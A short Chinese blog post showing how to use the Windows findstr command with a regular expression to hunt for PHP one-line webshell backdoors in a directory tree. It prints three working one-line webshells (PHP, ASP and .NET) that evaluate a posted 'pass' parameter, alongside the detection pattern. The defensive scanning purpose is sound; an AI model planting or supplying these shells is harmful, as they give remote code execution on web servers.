路漫漫其修远兮,吾将上下而求索

导航

使用findstr查找本地木马文件

在当前目录和子目录下搜索

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php

/R是使用正则表达式,/S是在当前和子目录中查找,中间有空格

 

 

 

PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

 

posted on 2021-02-02 09:26  爱在西元间  阅读(86)  评论(0编辑  收藏  举报